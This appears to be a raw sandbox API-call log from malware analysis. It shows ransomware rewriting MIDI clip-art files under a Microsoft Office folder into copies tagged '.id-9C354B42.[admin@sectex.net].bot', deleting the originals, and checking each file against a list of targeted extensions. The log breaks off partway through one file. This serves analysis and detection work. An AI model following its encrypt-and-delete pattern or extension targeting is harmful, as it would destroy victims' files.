	[0140.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0140.773] GetLastError () returned 0x0
	[0140.773] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x1cb3, lpOverlapped=0x0) returned 1
	[0140.786] WriteFile (in: hFile=0x3bc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x1cc0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x1cc0, lpOverlapped=0x0) returned 1
	[0140.787] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.787] WriteFile (in: hFile=0x3bc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.787] SetEndOfFile (hFile=0x3bc) returned 1
	[0140.787] CloseHandle (hObject=0x3bc) returned 1
	[0140.787] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.787] SetEndOfFile (hFile=0x31c) returned 1
	[0140.789] CloseHandle (hObject=0x31c) returned 1
	[0140.789] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.796] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid")) returned 1
	[0140.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63
	[0140.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63
	[0140.804] lstrlenW (lpString=".doc") returned 4
	[0140.804] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.804] lstrlenW (lpString=".docx") returned 5
	[0140.804] lstrcmpiW (lpString1=".docx", lpString2="8.MID") returned -1
	[0140.804] lstrlenW (lpString=".pdf") returned 4
	[0140.804] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.804] lstrlenW (lpString=".xls") returned 4
	[0140.804] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.804] lstrlenW (lpString=".xlsx") returned 5
	[0140.804] lstrcmpiW (lpString1=".xlsx", lpString2="8.MID") returned -1
	[0140.804] lstrlenW (lpString=".ppt") returned 4
	[0140.805] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63
	[0140.805] lstrlenW (lpString=".zip") returned 4
	[0140.805] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.805] lstrlenW (lpString=".rar") returned 4
	[0140.805] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.805] lstrlenW (lpString=".bz2") returned 4
	[0140.805] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.805] lstrlenW (lpString=".7z") returned 3
	[0140.805] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63
	[0140.805] lstrlenW (lpString=".dbf") returned 4
	[0140.805] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63
	[0140.805] lstrlenW (lpString=".1cd") returned 4
	[0140.805] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63
	[0140.805] lstrlenW (lpString=".jpg") returned 4
	[0140.805] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63
	[0140.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63
	[0140.805] lstrlenW (lpString=".doc") returned 4
	[0140.805] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.805] lstrlenW (lpString=".docx") returned 5
	[0140.805] lstrcmpiW (lpString1=".docx", lpString2="8.MID") returned -1
	[0140.805] lstrlenW (lpString=".pdf") returned 4
	[0140.805] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.805] lstrlenW (lpString=".xls") returned 4
	[0140.805] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.805] lstrlenW (lpString=".xlsx") returned 5
	[0140.805] lstrcmpiW (lpString1=".xlsx", lpString2="8.MID") returned -1
	[0140.805] lstrlenW (lpString=".ppt") returned 4
	[0140.805] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63
	[0140.806] lstrlenW (lpString=".zip") returned 4
	[0140.806] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.806] lstrlenW (lpString=".rar") returned 4
	[0140.806] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.806] lstrlenW (lpString=".bz2") returned 4
	[0140.806] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.806] lstrlenW (lpString=".7z") returned 3
	[0140.806] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63
	[0140.806] lstrlenW (lpString=".dbf") returned 4
	[0140.806] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63
	[0140.806] lstrlenW (lpString=".1cd") returned 4
	[0140.806] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63
	[0140.806] lstrlenW (lpString=".jpg") returned 4
	[0140.806] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.806] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.806] lstrlenW (lpString="ROAD_01.MID") returned 11
	[0140.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0140.807] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=5983) returned 1
	[0140.807] CloseHandle (hObject=0x3bc) returned 1
	[0140.807] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid")) returned 0x20
	[0140.807] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0140.807] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.807] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0140.808] GetLastError () returned 0x0
	[0140.808] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x175f, lpOverlapped=0x0) returned 1
	[0140.809] WriteFile (in: hFile=0x3ac, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x1760, lpOverlapped=0x0) returned 1
	[0140.810] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.810] WriteFile (in: hFile=0x3ac, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0140.810] SetEndOfFile (hFile=0x3ac) returned 1
	[0140.811] CloseHandle (hObject=0x3ac) returned 1
	[0140.811] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.811] SetEndOfFile (hFile=0x3bc) returned 1
	[0140.814] CloseHandle (hObject=0x3bc) returned 1
	[0140.814] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.814] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid")) returned 1
	[0140.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62
	[0140.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62
	[0140.815] lstrlenW (lpString=".doc") returned 4
	[0140.815] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.815] lstrlenW (lpString=".docx") returned 5
	[0140.815] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.815] lstrlenW (lpString=".pdf") returned 4
	[0140.815] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.815] lstrlenW (lpString=".xls") returned 4
	[0140.815] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.815] lstrlenW (lpString=".xlsx") returned 5
	[0140.815] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.815] lstrlenW (lpString=".ppt") returned 4
	[0140.815] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62
	[0140.815] lstrlenW (lpString=".zip") returned 4
	[0140.815] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.815] lstrlenW (lpString=".rar") returned 4
	[0140.815] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.815] lstrlenW (lpString=".bz2") returned 4
	[0140.815] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.815] lstrlenW (lpString=".7z") returned 3
	[0140.815] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62
	[0140.815] lstrlenW (lpString=".dbf") returned 4
	[0140.815] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62
	[0140.815] lstrlenW (lpString=".1cd") returned 4
	[0140.815] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62
	[0140.815] lstrlenW (lpString=".jpg") returned 4
	[0140.815] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62
	[0140.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62
	[0140.816] lstrlenW (lpString=".doc") returned 4
	[0140.816] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.816] lstrlenW (lpString=".docx") returned 5
	[0140.816] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.816] lstrlenW (lpString=".pdf") returned 4
	[0140.816] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.816] lstrlenW (lpString=".xls") returned 4
	[0140.816] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.816] lstrlenW (lpString=".xlsx") returned 5
	[0140.816] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.816] lstrlenW (lpString=".ppt") returned 4
	[0140.816] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62
	[0140.816] lstrlenW (lpString=".zip") returned 4
	[0140.816] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.816] lstrlenW (lpString=".rar") returned 4
	[0140.816] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.816] lstrlenW (lpString=".bz2") returned 4
	[0140.816] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.816] lstrlenW (lpString=".7z") returned 3
	[0140.816] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62
	[0140.816] lstrlenW (lpString=".dbf") returned 4
	[0140.816] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62
	[0140.816] lstrlenW (lpString=".1cd") returned 4
	[0140.816] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62
	[0140.816] lstrlenW (lpString=".jpg") returned 4
	[0140.816] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.817] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.817] lstrlenW (lpString="SAFRI_01.MID") returned 12
	[0140.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0140.818] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=10122) returned 1
	[0140.818] CloseHandle (hObject=0x3bc) returned 1
	[0140.818] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid")) returned 0x20
	[0140.818] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0140.818] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.818] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0140.819] GetLastError () returned 0x0
	[0140.819] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x278a, lpOverlapped=0x0) returned 1
	[0140.820] WriteFile (in: hFile=0x384, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x2790, lpOverlapped=0x0) returned 1
	[0140.822] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.822] WriteFile (in: hFile=0x384, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.822] SetEndOfFile (hFile=0x384) returned 1
	[0140.822] CloseHandle (hObject=0x384) returned 1
	[0140.822] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.822] SetEndOfFile (hFile=0x3bc) returned 1
	[0140.824] CloseHandle (hObject=0x3bc) returned 1
	[0140.825] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.825] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid")) returned 1
	[0140.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63
	[0140.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63
	[0140.825] lstrlenW (lpString=".doc") returned 4
	[0140.825] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.825] lstrlenW (lpString=".docx") returned 5
	[0140.825] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.825] lstrlenW (lpString=".pdf") returned 4
	[0140.826] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.826] lstrlenW (lpString=".xls") returned 4
	[0140.826] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.826] lstrlenW (lpString=".xlsx") returned 5
	[0140.826] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.826] lstrlenW (lpString=".ppt") returned 4
	[0140.826] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63
	[0140.826] lstrlenW (lpString=".zip") returned 4
	[0140.826] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.826] lstrlenW (lpString=".rar") returned 4
	[0140.826] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.826] lstrlenW (lpString=".bz2") returned 4
	[0140.826] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.826] lstrlenW (lpString=".7z") returned 3
	[0140.826] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63
	[0140.826] lstrlenW (lpString=".dbf") returned 4
	[0140.826] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63
	[0140.826] lstrlenW (lpString=".1cd") returned 4
	[0140.826] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63
	[0140.826] lstrlenW (lpString=".jpg") returned 4
	[0140.826] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63
	[0140.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63
	[0140.826] lstrlenW (lpString=".doc") returned 4
	[0140.826] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.826] lstrlenW (lpString=".docx") returned 5
	[0140.826] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.826] lstrlenW (lpString=".pdf") returned 4
	[0140.826] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.826] lstrlenW (lpString=".xls") returned 4
	[0140.826] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.827] lstrlenW (lpString=".xlsx") returned 5
	[0140.827] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.827] lstrlenW (lpString=".ppt") returned 4
	[0140.827] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63
	[0140.827] lstrlenW (lpString=".zip") returned 4
	[0140.827] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.827] lstrlenW (lpString=".rar") returned 4
	[0140.827] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.827] lstrlenW (lpString=".bz2") returned 4
	[0140.827] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.827] lstrlenW (lpString=".7z") returned 3
	[0140.827] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63
	[0140.827] lstrlenW (lpString=".dbf") returned 4
	[0140.827] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63
	[0140.827] lstrlenW (lpString=".1cd") returned 4
	[0140.827] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63
	[0140.827] lstrlenW (lpString=".jpg") returned 4
	[0140.827] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.827] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.827] lstrlenW (lpString="SCHOL_02.MID") returned 12
	[0140.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0140.949] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=5058) returned 1
	[0140.949] CloseHandle (hObject=0x3a4) returned 1
	[0140.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid")) returned 0x20
	[0140.986] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0140.987] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.987] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
